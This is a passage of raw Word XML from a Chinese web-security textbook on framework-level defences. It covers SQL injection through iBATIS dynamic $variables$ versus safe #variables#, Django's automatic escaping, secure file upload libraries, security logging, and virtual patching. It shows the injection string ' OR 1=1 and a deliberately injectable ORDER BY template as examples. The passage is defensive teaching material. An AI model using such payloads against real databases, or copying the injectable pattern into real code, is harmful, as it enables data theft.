                <w:p>
                  <w:pPr>
                    <w:spacing w:line="264" w:lineRule="auto" w:before="2"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="237"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>select</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-40"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>TABLE_NAME,TABLESPACE_NAME</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-40"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>from</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-40"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>user_tables</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-40"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>where</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-40"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>table_name</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-40"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>like</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="-40"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>'%'||#table_ name#||'%'</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:line="181" w:lineRule="exact" w:before="0"/>
                    <w:ind w:left="266" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>order by $orderByColumn$</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:spacing w:val="56"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>$orderByType$</w:t>
                  </w:r>
                </w:p>
                <w:p>
                  <w:pPr>
                    <w:spacing w:before="20"/>
                    <w:ind w:left="28" w:right="0" w:firstLine="0"/>
                    <w:jc w:val="left"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Courier New"/>
                      <w:sz w:val="16"/>
                    </w:rPr>
                    <w:t>&lt;/select&gt;</w:t>
                  </w:r>
                </w:p>
              </w:txbxContent>
            </v:textbox>
            <v:fill type="solid"/>
            <w10:wrap type="topAndBottom"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>以 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ORM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-17"/>
        </w:rPr>
        <w:t>框架 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ibatis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>举例，它是基于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>的，生成的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>语句都结构化地写在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XML </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>件中。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ibatis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>支持动态 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>，可以在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>语句中插入动态变量：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>$value$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>，如果用户能够控制这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>个变量，则会存在一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>注入的漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="5"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="77"/>
        <w:ind w:left="203" w:right="223" w:firstLine="420"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>而静态变量 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>#value# </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>则是安全的，因此在使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>ibatis </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>时，只需要搜索所有的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>sqlmap </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t>中是否包含动态变量即可。当业务需要使用动态 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>时，可以作为特例处理，比如在上层的代码逻辑中针对该变量进行严格的控制，以保证不会发生注入问题。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="154"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-16"/>
        </w:rPr>
        <w:t>而在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>中，做法则更简单，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Django </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t>提供的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Database API</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>，默认已经将所有输入进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-26"/>
        </w:rPr>
        <w:t>了 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>转义，比如：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="92"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>foo.get_list(bar exact="' OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-16"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>1=1")</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>其最终效果类似于：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:sectPr>
          <w:pgSz w:w="8740" w:h="14750"/>
          <w:pgMar w:header="930" w:footer="0" w:top="1380" w:bottom="280" w:left="80" w:right="60"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="8396" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="90"/>
        <w:ind w:left="203" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="12.7  Web框架自身安全" w:id="74"/>
      <w:bookmarkEnd w:id="74"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>SELECT * FROM foos WHERE bar = '\' OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-17"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="16"/>
          <w:shd w:fill="DADADA" w:color="auto" w:val="clear"/>
        </w:rPr>
        <w:t>1=1'</w:t>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="15"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="623"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>使用 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>框架提供的功能，在代码风格上更加统一，也更利于代码审计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="11"/>
        <w:rPr>
          <w:sz w:val="31"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1060" w:val="left" w:leader="none"/>
          <w:tab w:pos="1061" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1060" w:right="0" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:name="12.6  还能想到什么" w:id="75"/>
      <w:bookmarkEnd w:id="75"/>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:bookmarkStart w:name="12.6  还能想到什么" w:id="76"/>
      <w:bookmarkEnd w:id="76"/>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>还能想到什么</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="299"/>
        <w:ind w:left="604"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>除了上面讲到的几点外，在框架中还能实现什么安全方案呢？</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto"/>
        <w:ind w:left="203" w:right="120" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>其实选择是很多的，凡是在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>框架中可能实现的安全方案，只要对性能没有太大的损耗， 都应该考虑实施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="160"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>比如文件上传功能，如果应用实现有问题，可能就会成为严重的漏洞。若是由每个业务单</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>独实现文件上传功能，其设计和代码都会存在差异，复杂情况也会导致安全问题难以控制。但</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-19"/>
        </w:rPr>
        <w:t>如果在 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>框架中能为文件上传功能提供一个足够安全的二方库或者函数</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>具体可参考“文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>上传漏洞”一章</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-99"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
          <w:w w:val="99"/>
        </w:rPr>
        <w:t>，就可以为业务线的开发者解决很多问题，让程序员可以把精力和重点放在</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>功能实现上。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="153"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-27"/>
        </w:rPr>
        <w:t>为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring MVC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>的用户提供了许多安全功能，比如基于 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>的访问控制、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t>加密方法、证书支持、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>OpenID </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>支持等。但 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Spring Security </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>尚缺乏诸如 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>CSRF </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>等问题的解决方案。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="307" w:lineRule="auto" w:before="155"/>
        <w:ind w:left="202" w:right="223" w:firstLine="400"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>在设计整体安全方案时，比较科学的方法是按照本书第 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>章中所列举的过程来进行——首先建立威胁模型，然后再判断哪些威胁是可以在框架中得到解决的。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="161"/>
        <w:ind w:left="202" w:right="123" w:firstLine="400"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t>在设计 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t>框架安全解决方案时，还需要保存好安全检查的日志。在设计安全逻辑时也需</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t>要考虑到日志的记录，比如发生 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>XSS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>攻击时，可以记录下攻击者的 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、时间、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>UserAgent</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>、目</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-30"/>
        </w:rPr>
        <w:t>标 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>、用户名等信息。这些日志，对于后期建立攻击事件分析、入侵分析都是有积极意义的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>当然，开启日志也会造成一定的性能损失，因此在设计时，需要考虑日志记录行为的频繁程度， 并尽可能避免误报。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="309" w:lineRule="auto" w:before="151"/>
        <w:ind w:left="202" w:right="123" w:firstLine="401"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
        </w:rPr>
        <w:t>在设计 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t>框架安全时，还需要与时俱进。当新的威胁出现时，应当及时完成对应的防御</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t>方案，如此一个 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>框架才具有生命力。而一些 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>0day </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>漏洞，也有可能通过“虚拟补丁”的方</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t>式在框架层面解决，因为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t>框架就像是一层外衣，为 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>应用提供了足够的保护和控制力。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:pos="1060" w:val="left" w:leader="none"/>
          <w:tab w:pos="1061" w:val="left" w:leader="none"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto" w:before="0" w:after="0"/>
        <w:ind w:left="1060" w:right="0" w:hanging="857"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Book Antiqua" w:eastAsia="Book Antiqua"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:w w:val="120"/>
        </w:rPr>
        <w:t>框架自身安全</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="292" w:lineRule="auto" w:before="253"/>
        <w:ind w:left="203" w:right="221" w:firstLine="400"/>
